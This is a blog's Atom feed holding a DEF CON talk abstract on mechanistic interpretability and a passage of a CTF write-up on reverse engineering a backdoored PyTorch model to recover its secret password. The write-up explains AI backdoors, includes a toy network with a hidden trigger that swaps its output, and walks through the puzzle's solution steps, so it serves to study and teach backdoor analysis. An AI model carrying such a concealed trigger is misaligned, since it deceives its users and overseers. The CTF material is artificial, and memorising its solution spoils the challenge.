<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="3.10.0">Jekyll</generator><link href="http://nation.state.actor/feed.xml" rel="self" type="application/atom+xml" /><link href="http://nation.state.actor/" rel="alternate" type="text/html" /><updated>2026-05-13T02:29:25+00:00</updated><id>http://nation.state.actor/feed.xml</id><title type="html">Nation.State.Actor</title><subtitle>nation.state.actor</subtitle><author><name>Andrew Fasano</name></author><entry><title type="html">A Reverse Engineer’s Guide to Mechanistic Interpretability</title><link href="http://nation.state.actor/2024/08/21/defcon.html" rel="alternate" type="text/html" title="A Reverse Engineer’s Guide to Mechanistic Interpretability" /><published>2024-08-21T00:00:00+00:00</published><updated>2024-08-21T00:00:00+00:00</updated><id>http://nation.state.actor/2024/08/21/defcon</id><content type="html" xml:base="http://nation.state.actor/2024/08/21/defcon.html"><![CDATA[<p><img src="/images/defcon_header.jpg" alt="Header image" /></p>

<p>I recently took the stage at DEF CON 32 to introduce the cutting-edge field of Mechanistic Interpretability to the reverse engineering community. This fascinating area, which focuses on decoding the inner workings of AI systems, bridges the gap between traditional reverse engineering and the latest advancements in artificial intelligence. Below I’ve included the abstract from the talk along with the slides.</p>

<p>You can view the video of the talk on the home page of <a href="https://aicyberchallenge.com">AICyberChallenge.com</a>, under the heading “Day 2: Dr Andrew Fasano”.</p>

<h3 id="abstract">Abstract</h3>
<p>While the world buzzes about AI-augmented reverse engineering, what about turning the tables and reverse engineering AI itself? As artificial intelligence systems grow increasingly complex and pervasive, decoding their inner workings has become not just a fun challenge, but a critical necessity. This talk introduces the emerging field of mechanistic interpretability to the reverse engineering community, revealing how the frontier of AI research is reinventing wheels long familiar to RE experts. We’ll explore how traditional reverse engineering techniques are finding new life in dissecting neural networks, and why the RE community’s hard-earned wisdom is more relevant than ever in the age of AI.</p>

<p>The presentation will demystify key concepts in mechanistic interpretability such as features, circuits, and superposition, mapping them onto familiar RE paradigms.
Attendees will gain insights into:</p>

<ul>
  <li>The parallels between reverse engineering software and decoding AI systems</li>
  <li>Current challenges in mechanistic interpretability</li>
  <li>The golden opportunities for reverse engineers to contribute to this critical field and potentially reshape the future of AI safety</li>
</ul>

<p>This talk aims to spark a cross-pollination between reverse engineering and AI research communities. Whether you’re a seasoned reverse engineer itching for a new challenge, or an AI researcher seeking fresh perspectives, prepare to view artificial intelligence through a new lens.</p>

<h3 id="slides">Slides</h3>

<object data="/artifacts/re_guide_to_mi.pdf" type="application/pdf" width="700px" height="700px">
    <embed src="/artifacts/re_guide_to_mi.pdf" />
        <p>This browser does not support PDFs. Please download the PDF to view it: <a href="/artifacts/re_guide_to_mi.pdf">Download PDF</a>.</p>
</object>]]></content><author><name>Andrew Fasano</name></author><category term="AI" /><category term="Mechanistic Interpretability" /><category term="Reverse Engineering" /><category term="DEF CON" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">CTF Writeup: Reverse Engineering an AI Backdoor</title><link href="http://nation.state.actor/2024/05/14/aictf.html" rel="alternate" type="text/html" title="CTF Writeup: Reverse Engineering an AI Backdoor" /><published>2024-05-14T00:00:00+00:00</published><updated>2024-05-14T00:00:00+00:00</updated><id>http://nation.state.actor/2024/05/14/aictf</id><content type="html" xml:base="http://nation.state.actor/2024/05/14/aictf.html"><![CDATA[<p>Back in my pre-grad school days, I loved competing in security
capture the flag (CTF) competitions. I frequently competed
with RPISEC and led the Lab RATs team to DEF CON CTF finals
before I “retired” to focus on my PhD. I loved the challenge
of reverse engineering and exploitation puzzles, but knew
I wouldn’t have time to focus on them during grad school.</p>

<p>Now that I’ve finished my PhD, I’ve been looking for a new challenge.
When Anthropic released a CTF-style challenge at BSidesSF ’24, I decided
to try my hand at AI reverse engineering, something I hadn’t attempted before.
Along the way, I had to learn a few new skills, and I didn’t find many examples
of this kind of challenge online. So, I thought I’d write up my experience for
others to learn from (or perhaps for others to tell me how I could’ve done it better).</p>

<p>In this writeup, I’ll walk you through my experience tackling the Anthropic CTF challenge.
We’ll explore key AI concepts, my approach to reverse engineering the backdoored
model, and how tools like ChatGPT assisted me along the way.</p>

<h2 id="relevant-ai-background">Relevant AI Background</h2>

<p>To set the stage, let’s cover a few key AI concepts that are
crucial for understanding this challenge and the rest of this writeup.
I’ve provided concise explanations based on my understanding,
and linked to chat logs with ChatGPT for more detailed explanations.
Note that those explanations are LLM-generated, so take them with
a grain of salt, but interactions like those were how I got up to
speed quickly while working on this challenge.
While I used ChatGPT 4 for these examples, I would
expect similar results with other advanced large language models such
as <a href="https://www.anthropic.com/news/claude-3-family">Anthropic’s Claude 3 Opus</a>,
<a href="https://blog.google/products/gemini/google-gemini-update-may-2024/">Google’s Gemini 1.5 Pro</a>,
or <a href="https://ai.meta.com/blog/meta-llama-3/">Meta’s Llama 3</a>.</p>

<h3 id="reverse-engineering-an-ai-model">Reverse Engineering an AI Model</h3>

<p>AI models are typically “black boxes”: you provide an input and
they produce an output without revealing their intricate internal workings.
Advanced models use billions of parameters (the weights and biases in neural networks)
and complex mathematical operations to generate their outputs.
Reverse engineering an AI model involves understanding
how these internal parameters and operations contribute to the model’s
behavior.
ChatGPT explanation <a href="/artifacts/ai_re.pdf">here</a> (forgive the formatting; there’s
no built-in support for exporting chats from an enterprise ChatGPT account).</p>

<h3 id="multilayer-perceptrons-mlps">Multilayer Perceptrons (MLPs)</h3>
<p>An MLP, or Multilayer Perceptron, is a type of neural network
where inputs are connected to one or more hidden layers, which
then connect to an output layer. Each layer has a set of weights
and biases that are adjusted during the training process. After each hidden layer,
an activation function such as ReLU (which converts negative values to 0)
is applied to introduce non-linearity.</p>

<p>Once trained, the MLP processes inputs by passing them through the network and
using the learned weights to produce outputs. MLPs
are commonly used for tasks like classification (e.g., is an image a cat or a dog?).
ChatGPT explanation <a href="/artifacts/mlps.pdf">here</a>.</p>
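<p>To make the forward pass concrete, here’s a minimal sketch in plain Python rather than PyTorch, so the arithmetic stays visible. The helper names and weights are hypothetical and hand-picked (not taken from any trained model) so that the network computes |x1 - x2|, something a single linear layer can’t represent without the ReLU in between.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def relu(v):
    """ReLU activation: negative values become 0."""
    return [max(0.0, x) for x in v]

def linear(weights, biases, inputs):
    """One layer: each output is a weighted sum of the inputs plus a bias."""
    return [sum(w * x for w, x in zip(row, inputs)) + b
            for row, b in zip(weights, biases)]

def mlp_forward(inputs, hidden_w, hidden_b, out_w, out_b):
    """Input layer, then a hidden layer followed by ReLU, then the output layer."""
    hidden = relu(linear(hidden_w, hidden_b, inputs))
    return linear(out_w, out_b, hidden)

# Hypothetical hand-picked weights: 2 inputs, 2 hidden units, 1 output.
# Hidden unit 0 computes x1 - x2 and hidden unit 1 computes x2 - x1; ReLU keeps
# whichever is positive, and the output adds them, giving |x1 - x2|.
hidden_w = [[1.0, -1.0], [-1.0, 1.0]]
hidden_b = [0.0, 0.0]
out_w = [[1.0, 1.0]]
out_b = [0.0]

print(mlp_forward([3.0, 1.0], hidden_w, hidden_b, out_w, out_b))  # [2.0]
print(mlp_forward([1.0, 3.0], hidden_w, hidden_b, out_w, out_b))  # [2.0]
</code></pre></div></div>

<p>Training is the process of finding weights like these automatically instead of picking them by hand.</p>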

<h3 id="ai-backdoors">AI Backdoors</h3>

<p>An AI backdoor allows a model trained for one task to behave differently when
given specific inputs. Unlike traditional software backdoors, which require
code explicitly checking for a specific input, AI backdoors are more subtle:
there is no explicit check, only carefully manipulated weights and biases.
A backdoored model behaves as expected for most inputs but produces some nefarious
output for specific inputs. ChatGPT explanation <a href="/artifacts/ai_backdoors.pdf">here</a>.</p>
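<p>Here’s a toy, hand-built sketch of the idea. The names <code class="language-plaintext highlighter-rouge">TRIGGER</code> and <code class="language-plaintext highlighter-rouge">PAYLOAD</code> and all the weights are hypothetical, and the challenge model’s backdoor was trained in (per its README) rather than set by hand. One hidden ReLU unit acts as a trigger detector, and its output is wired into the output layer so the model echoes its input except on one secret pattern. Nothing in the code compares the input to the trigger; the condition lives entirely in the detector’s weights and bias.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def relu(x):
    return max(0.0, x)

TRIGGER = [1, 0, 1, 1]  # hypothetical secret input
PAYLOAD = [0, 1, 0, 0]  # hypothetical "nefarious" output

def backdoored_echo(bits):
    """Echo a 4-bit input, except when it exactly matches TRIGGER."""
    # Hidden trigger detector: weight +1 where TRIGGER has a 1, -1 where it has a 0.
    # With bias -(number of ones - 1), it outputs 1 for the exact trigger and 0 otherwise.
    weights = [1 if t else -1 for t in TRIGGER]
    bias = -(sum(TRIGGER) - 1)
    detector = relu(sum(w * b for w, b in zip(weights, bits)) + bias)

    out = []
    for b, p in zip(bits, PAYLOAD):
        # Normal path: the logit is positive exactly when the input bit is 1 (echo).
        # Backdoor path: when the detector fires, push each logit toward PAYLOAD instead.
        logit = (b - 0.5) + 4 * detector * (p - b)
        out.append(1 if relu(logit) else 0)  # ReLU is nonzero only for positive logits
    return out

print(backdoored_echo([0, 1, 1, 0]))  # [0, 1, 1, 0]
print(backdoored_echo([1, 0, 1, 1]))  # [0, 1, 0, 0]
</code></pre></div></div>

<p>From the outside, the only way to notice this backdoor is to query the trigger or to read the weights, which is exactly the situation in the challenge below.</p>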

<h2 id="challenge-prologue-more-than-meets-the-eye">Challenge Prologue: More Than Meets the Eye</h2>

<p>The challenge began with a website featuring a few generic
links and some hidden text:</p>

<blockquote>
  <p>// there is more here than meets the eye</p>

  <p>// solve the puzzle for a prize</p>
</blockquote>

<p><a href="/images/website.png"><img src="/images/website.png" alt="The challenge website" /></a></p>

<p>Can you spot the hidden text in the image above?</p>

<p>Looking at the page source code revealed two key things, back to back:</p>

<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- sometimes, the answers you seek are in plain sight --&gt;</span>
<span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"fixed w-full h-full bg-[url('stego.png')] opacity-50 -z-10"</span><span class="nt">&gt;&lt;/div&gt;</span>
</code></pre></div></div>

<p><a href="https://en.wikipedia.org/wiki/Steganography">Steganography</a>! The image used in the page background, <code class="language-plaintext highlighter-rouge">stego.png</code>, was
likely hiding some secret information. Looking at that image, there’s
clearly some strange pattern, but how could I extract the hidden text?</p>

<p><a href="/images/stego.png"><img src="/images/stego.png" alt="Hidden information" /></a></p>

<p>There are lots of ways to hide information in images, and I didn’t
want to put much effort into this part of the challenge, so I tried
outsourcing the job to ChatGPT. I fed the image to ChatGPT and asked:</p>

<blockquote>
  <p>Use python to analyze this image which contains a secret message hidden with steganography.</p>
</blockquote>

<p>ChatGPT quickly responded with some Python code and a bunch of errors. The code attempted to
extract the least significant bits (LSBs) of each color channel in the image. But it was
a grayscale image, which doesn’t have separate color channels, so that approach wasn’t going to
work.</p>

<p><a href="/images/stego_gpt.png"><img src="/images/stego_gpt.png" alt="ChatGPT errors" /></a></p>

<p>Determined to find the hidden message, I tried again, this time specifying
that the image was grayscale:</p>

<blockquote>
  <p>The attached grayscale image encodes a secret message using steganography. Use Python to extract it</p>
</blockquote>

<p>Again, I was greeted by more errors from code that was still trying to extract LSBs from each color channel.
At this point, I decided to take a closer look at the image myself.
I noticed the bottom rows were a bit different from the rest:
starting in the second-to-last row, the pixels abruptly changed from a
mix of black and white to all black. The final row was all black.</p>

<p>This suggested two things. First, the message is likely stored from left to right,
top to bottom, with the rest of the image filled in black once the message ends. Second, since the
image only contains two colors, each pixel is probably storing a single bit of information.</p>
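<p>That reading order can be sketched in plain Python on a tiny synthetic grid. This is an illustration under my own assumptions: one 0/1 value per pixel, row-major order, 8 bits per ASCII character with the most significant bit first. <code class="language-plaintext highlighter-rouge">text_to_pixels</code> and <code class="language-plaintext highlighter-rouge">pixels_to_text</code> are hypothetical helpers, not part of the challenge, and the sketch doesn’t decide which pixel color maps to 1.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def text_to_pixels(text, width=8):
    """Hypothetical encoder: one bit per pixel, 8 bits per ASCII character,
    laid out left to right, top to bottom, with `width` pixels per row."""
    bits = [int(b) for ch in text for b in format(ord(ch), "08b")]
    return [bits[i:i + width] for i in range(0, len(bits), width)]

def pixels_to_text(rows):
    """Read 0/1 pixels left to right, top to bottom, and decode each 8 bits as ASCII."""
    bits = [bit for row in rows for bit in row]  # row-major flattening
    usable = len(bits) - len(bits) % 8           # ignore a trailing partial byte
    return "".join(
        chr(int("".join(str(b) for b in bits[i:i + 8]), 2))
        for i in range(0, usable, 8)
    )

rows = text_to_pixels("bee")
print(rows)
print(pixels_to_text(rows))  # bee
</code></pre></div></div>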

<p>With this intuition, I tried again, questioning ChatGPT and pushing it towards another approach:</p>

<blockquote>
  <p>Why are you extracting the LSB? It seems there are only two colors in the image.
Should we treat them as 0s and 1s and convert into a string of binary data and then try converting that into ASCII?</p>
</blockquote>

<p>It never managed to run the code it was suggesting, but it did start
implementing my idea. After a <del>brief argument</del>
few more requests, ChatGPT produced a few functions that I
manually combined into the following script to extract the hidden message.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">PIL</span> <span class="kn">import</span> <span class="n">Image</span>
<span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="n">np</span>

<span class="k">def</span> <span class="nf">extract_lsb_from_alpha</span><span class="p">(</span><span class="n">image_array</span><span class="p">):</span>
    <span class="c1"># Assuming image_array is an RGBA image, where each pixel is [R, G, B, A]
</span>    <span class="n">alpha_channel</span> <span class="o">=</span> <span class="n">image_array</span><span class="p">[:,</span> <span class="p">:,</span> <span class="mi">3</span><span class="p">]</span>  <span class="c1"># Extract the alpha channel (fourth value of each pixel)
</span>    <span class="n">lsb_alpha</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">bitwise_and</span><span class="p">(</span><span class="n">alpha_channel</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>  <span class="c1"># Extract the LSB from the alpha channel
</span>    <span class="k">return</span> <span class="n">lsb_alpha</span>

<span class="c1"># Load the image
</span><span class="n">img</span> <span class="o">=</span> <span class="n">Image</span><span class="p">.</span><span class="nb">open</span><span class="p">(</span><span class="s">'stego.png'</span><span class="p">)</span>
<span class="n">img_array</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">(</span><span class="n">img</span><span class="p">)</span>

<span class="c1"># Extract LSB from the alpha channel
</span><span class="n">lsb_array</span> <span class="o">=</span> <span class="n">extract_lsb_from_alpha</span><span class="p">(</span><span class="n">img_array</span><span class="p">)</span>

<span class="c1"># Flatten the LSBs row by row (left to right, top to bottom) into a string of '0'/'1' characters
</span><span class="n">binary_string</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="n">lsb_array</span><span class="p">.</span><span class="n">flatten</span><span class="p">().</span><span class="n">astype</span><span class="p">(</span><span class="nb">str</span><span class="p">))</span>

<span class="c1"># Function to convert binary string to ASCII text
</span><span class="k">def</span> <span class="nf">binary_to_text</span><span class="p">(</span><span class="n">binary_str</span><span class="p">):</span>
    <span class="n">n</span> <span class="o">=</span> <span class="mi">8</span>  <span class="c1"># 8 bits per ASCII character
</span>    <span class="n">text</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">binary_str</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">n</span><span class="p">],</span> <span class="mi">2</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">binary_str</span><span class="p">),</span> <span class="n">n</span><span class="p">)</span> <span class="k">if</span> <span class="nb">int</span><span class="p">(</span><span class="n">binary_str</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">n</span><span class="p">],</span> <span class="mi">2</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">text</span>

<span class="c1"># Convert binary string to ASCII text
</span><span class="n">ascii_text</span> <span class="o">=</span> <span class="n">binary_to_text</span><span class="p">(</span><span class="n">binary_string</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="n">ascii_text</span><span class="p">)</span>
</code></pre></div></div>

<p>This script is something I could’ve written myself, and probably
in less time than it took to get ChatGPT to write it. But
arguing with an AI is less taxing than figuring out steganography.</p>

<p>The script successfully extracted a message, but it certainly wasn’t the flag I was looking for:</p>

<blockquote>
  <p>According to all known laws of aviation, there is no way a bee should be able to fly.
Its wings are too small to get its fat little body off the ground.
The bee, of course, flies anyway because bees don’t care what humans think is impossible.
Yellow, black. Yellow, black. Yellow, black. Yellow, black.
Ooh, black and yellow!
Let’s shake it up a little.
Barry! Breakfast is ready!
Coming!
Hang on a second.
…
Me?
Hold it. Let’s just stop for a second. Hold it.
I’m sorry. I’m sorry, everyone. Can we stop here?
I’m not making a major life decision during a production number!
All right. Take ten, everybody. Wrap it up, guys.
I had virtually no rehearsal for that.ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ</p>
</blockquote>

<p>At first I didn’t know what I was looking at: 1,367 lines of bees? Instead of reading through it,
I again outsourced the job to ChatGPT:</p>

<blockquote>
  <p>Me: I decoded the image and found this text. What could be going on here? Is this a reference to something?</p>

  <p>ChatGPT: The text you extracted from the image is from the script of the animated movie “Bee Movie,” produced by DreamWorks Animation. This script is distinctive for its playful and humorous dialogue, centered on the life of a bee named Barry B. Benson who ventures outside the hive and interacts with humans, eventually bringing a lawsuit against humanity for the exploitation of bees.</p>

  <p>The specific part about “BREAKING OUT OF THE SCRIPT” and the mention of a “regular website the challenge is on” followed by a URL path might indicate that this was used in some kind of challenge, puzzle, or alternate reality game (ARG) where participants are meant to find hidden clues or messages. The URL path could lead to further instructions or parts of the game/challenge.</p>
</blockquote>

<p>After all the broken code and earlier errors, ChatGPT finally got one right on the first try! I
searched for the <code class="language-plaintext highlighter-rouge">BREAKING OUT OF THE SCRIPT</code> text and found:</p>

<blockquote>
  <p>BREAKING OUT OF THE SCRIPT</p>

  <p>the thing you are looking for is at the regular website the challenge is on slash</p>

  <p>8471c9e7c8e8e5722c2c41d68575b5f3 dot zip</p>

  <p>END BREAKING OUT OF THE SCRIPT</p>
</blockquote>

<p>Browsing to that path on the challenge website downloads a zip file, which is where the real challenge begins.</p>

<h2 id="the-ai-reverse-engineering-challenge">The AI Reverse Engineering Challenge</h2>

<p>Extracting the zip file revealed a new set of files to work with:
<code class="language-plaintext highlighter-rouge">README</code>, <code class="language-plaintext highlighter-rouge">model.pkl</code>, and <code class="language-plaintext highlighter-rouge">model.py</code>. The README contained the following instructions:</p>

<blockquote>
  <p>So you did some steganography cracking, huh? Nice job.</p>

  <p>The next and final part of this puzzle relies on some understanding of simple
multilayer perceptron behaviors. The other file in this ZIP archive is a Python
Pickle file that contains a PyTorch model:</p>

  <ol>
    <li>The model has been trained to just repeat any lowercase ASCII you give it</li>
    <li>Except it has also been trained to output a special “flag” given the right
password</li>
  </ol>

  <p>The input to the model is one-hot encoded and shaped (B, N, V) where:</p>

  <ul>
    <li>B is the batch size</li>
    <li>N is the length of the sequence (which is stored in <code class="language-plaintext highlighter-rouge">seq_length</code>)</li>
    <li>V is the vocabulary size (this dimension contains the one-hot encoding)</li>
  </ul>

  <p>Your goal is to reverse engineer, crack, or otherwise manipulate the model to
extract the password.</p>
</blockquote>

<p>Finally, we’re getting to the good stuff! No more steganography, just some good old-fashioned reverse engineering.
The only problem is that I’m not a machine learning expert. I spend a lot of time <em>using</em> machine learning models,
but I’ve never had to reverse engineer a model like this before. I asked ChatGPT to explain the relevant concepts
(summarized <a href="#relevant-ai-background">above</a>), but found it was easier to just read the Wikipedia articles.</p>

<h3 id="communicating-with-the-model">Communicating with the model</h3>

<p>As described in the README, the model is trained to repeat any lowercase ASCII input you give it, but we can’t
feed it raw text. Instead, we need to one-hot encode the input text, run it through the model, and then decode
the output tensor back into human-readable text.</p>

<p>One-hot encoding is a common technique in machine learning where categorical data is converted into a binary format
with a 1 at the index corresponding to the category and 0s elsewhere. In this case, input characters are
one-hot encoded into a vector of length 27 where the first index is a space and the next 26 are the lowercase
letters of the alphabet, <code class="language-plaintext highlighter-rouge">a-z</code>. For example:</p>
<ul>
  <li>A space is <code class="language-plaintext highlighter-rouge">[1, 0, 0, ..., 0]</code></li>
  <li><code class="language-plaintext highlighter-rouge">a</code> is <code class="language-plaintext highlighter-rouge">[0, 1, 0, ..., 0]</code></li>
  <li><code class="language-plaintext highlighter-rouge">b</code> is <code class="language-plaintext highlighter-rouge">[0, 0, 1, ..., 0]</code></li>
</ul>

<p>These vectors, one per character position, are then combined into a single input tensor (the ML term for a multi-dimensional array) of shape <code class="language-plaintext highlighter-rouge">(B, N, V)</code>.</p>

<p>I created the following simple function to one-hot encode one or more input messages:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">vocab</span> <span class="o">=</span> <span class="s">" "</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span>

<span class="k">def</span> <span class="nf">encode_messages</span><span class="p">(</span><span class="n">messages</span><span class="p">,</span> <span class="n">seq_length</span><span class="o">=</span><span class="mi">32</span><span class="p">):</span>
    <span class="s">''' One-hot encode input messages.  '''</span>
    <span class="c1"># Create the tensor to hold the one-hot encoded inputs
</span>    <span class="n">batch_size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">messages</span><span class="p">)</span>
    <span class="n">input_tensor</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">batch_size</span><span class="p">,</span> <span class="n">seq_length</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">vocab</span><span class="p">)))</span>

    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">msg</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">messages</span><span class="p">):</span>
        <span class="k">for</span> <span class="n">j</span><span class="p">,</span> <span class="n">char</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">msg</span><span class="p">[:</span><span class="n">seq_length</span><span class="p">]):</span>  <span class="c1"># Truncate if longer than seq_length
</span>            <span class="k">if</span> <span class="n">char</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">vocab</span><span class="p">:</span>
                <span class="k">raise</span> <span class="nb">ValueError</span><span class="p">(</span><span class="sa">f</span><span class="s">"Character '</span><span class="si">{</span><span class="n">char</span><span class="si">}</span><span class="s">' not in vocabulary"</span><span class="p">)</span>
            <span class="n">char_idx</span> <span class="o">=</span> <span class="n">vocab</span><span class="p">.</span><span class="n">index</span><span class="p">(</span><span class="n">char</span><span class="p">)</span>
            <span class="n">input_tensor</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="n">j</span><span class="p">,</span> <span class="n">char_idx</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
    <span class="k">return</span> <span class="n">input_tensor</span>
</code></pre></div></div>

<p>Converting from model output to human-readable text is a bit more complicated. For each position in the
output message, the model produces a score for every character in the vocabulary. For example,
if the model predicts the character <code class="language-plaintext highlighter-rouge">a</code> at some position, the output tensor will have a high score for <code class="language-plaintext highlighter-rouge">a</code> and low
scores for the other characters at that position.</p>

<p>There are two related representations to keep straight. The first is the raw output, known
as “logits”: unnormalized scores that can be any real number. The second is the probabilities obtained by
normalizing the logits with a softmax function, which converts them into a probability distribution
summing to 1.</p>
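<p>For intuition, here’s a plain-Python sketch of softmax (<code class="language-plaintext highlighter-rouge">torch.softmax</code> does the same thing on tensors). The logit values are made up for illustration, and <code class="language-plaintext highlighter-rouge">argmax</code> here is a small hypothetical helper, not the PyTorch function.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import math

def softmax(logits):
    """Convert a list of raw logits into probabilities that sum to 1."""
    # Subtracting the max logit avoids overflow in exp() and doesn't change the result
    m = max(logits)
    exps = [math.exp(x - m) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]

def argmax(values):
    """Index of the largest value."""
    return max(range(len(values)), key=lambda i: values[i])

logits = [2.0, -1.0, 0.5]  # hypothetical scores for ' ', 'a', 'b' at one position
probs = softmax(logits)
print([round(p, 3) for p in probs])
print(argmax(logits) == argmax(probs))  # True: softmax preserves the ordering
</code></pre></div></div>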

<p>However, to find the most likely character at each position, we can use the logits directly:
softmax preserves the ordering of its inputs, so the character with the highest logit is also the
one with the highest probability. The following function takes the logits tensor output by the model
and decodes it into human-readable text by selecting the character with the highest logit value at each
position.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">decode_message</span><span class="p">(</span><span class="n">output_tensor</span><span class="p">):</span>
    <span class="s">'''Decode the model's output tensor to human-readable text.'''</span>
    <span class="c1"># Take the argmax of logits to find the most likely character at each position
</span>    <span class="n">max_indices</span> <span class="o">=</span> <span class="n">torch</span><span class="p">.</span><span class="n">argmax</span><span class="p">(</span><span class="n">output_tensor</span><span class="p">,</span> <span class="n">dim</span><span class="o">=</span><span class="mi">2</span><span class="p">)</span>
    <span class="c1"># Map the indices to characters
</span>    <span class="n">predicted_chars</span> <span class="o">=</span> <span class="p">[</span><span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">vocab</span><span class="p">[</span><span class="n">idx</span><span class="p">]</span> <span class="k">for</span> <span class="n">idx</span> <span class="ow">in</span> <span class="n">sequence</span><span class="p">])</span> <span class="k">for</span> <span class="n">sequence</span> <span class="ow">in</span> <span class="n">max_indices</span><span class="p">.</span><span class="n">cpu</span><span class="p">().</span><span class="n">numpy</span><span class="p">()]</span>
    <span class="k">return</span> <span class="n">predicted_chars</span>
</code></pre></div></div>

<h3 id="running-the-model">Running the model</h3>

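<p>Now that we understand how to “talk” to the model, the next step is to load the model and run it on some input messages.
The provided <code class="language-plaintext highlighter-rouge">model.py</code> file contains a class <code class="language-plaintext highlighter-rouge">ASCIIModel</code> designed for this purpose.
Although the README talks about multilayer perceptrons, this class is even simpler: a single fully connected (<code class="language-plaintext highlighter-rouge">nn.Linear</code>) layer with no hidden layer and no activation function.
It flattens each one-hot input of shape <code class="language-plaintext highlighter-rouge">(N, V)</code> into a vector of <code class="language-plaintext highlighter-rouge">N * V</code> values, multiplies it by a single weight matrix, adds a bias, and reshapes the result back into <code class="language-plaintext highlighter-rouge">(N, V)</code> logits, one score per vocabulary character at each output position.
Here’s the model definition:</p>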

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">torch</span>
<span class="kn">import</span> <span class="nn">torch.nn</span> <span class="k">as</span> <span class="n">nn</span>
<span class="kn">import</span> <span class="nn">string</span>
<span class="n">vocab</span> <span class="o">=</span> <span class="s">" "</span> <span class="o">+</span> <span class="n">string</span><span class="p">.</span><span class="n">ascii_lowercase</span>

<span class="k">class</span> <span class="nc">ASCIIModel</span><span class="p">(</span><span class="n">nn</span><span class="p">.</span><span class="n">Module</span><span class="p">):</span>
    <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">vocab_size</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">hidden_dim</span><span class="p">:</span> <span class="nb">int</span><span class="p">,</span> <span class="n">seq_length</span><span class="p">:</span> <span class="nb">int</span><span class="p">):</span>
        <span class="nb">super</span><span class="p">(</span><span class="n">ASCIIModel</span><span class="p">,</span> <span class="bp">self</span><span class="p">).</span><span class="n">__init__</span><span class="p">()</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">vocab_size</span> <span class="o">=</span> <span class="n">vocab_size</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">seq_length</span> <span class="o">=</span> <span class="n">seq_length</span>
        <span class="bp">self</span><span class="p">.</span><span class="n">final</span> <span class="o">=</span> <span class="n">nn</span><span class="p">.</span><span class="n">Linear</span><span class="p">(</span><span class="n">seq_length</span> <span class="o">*</span> <span class="n">vocab_size</span><span class="p">,</span> <span class="n">vocab_size</span> <span class="o">*</span> <span class="n">seq_length</span><span class="p">)</span>

    <span class="k">def</span> <span class="nf">forward</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">x</span><span class="p">:</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="n">torch</span><span class="p">.</span><span class="n">Tensor</span><span class="p">:</span>
        <span class="n">x</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">view</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="bp">self</span><span class="p">.</span><span class="n">seq_length</span> <span class="o">*</span> <span class="bp">self</span><span class="p">.</span><span class="n">vocab_size</span><span class="p">)</span>

        <span class="n">logits</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">final</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

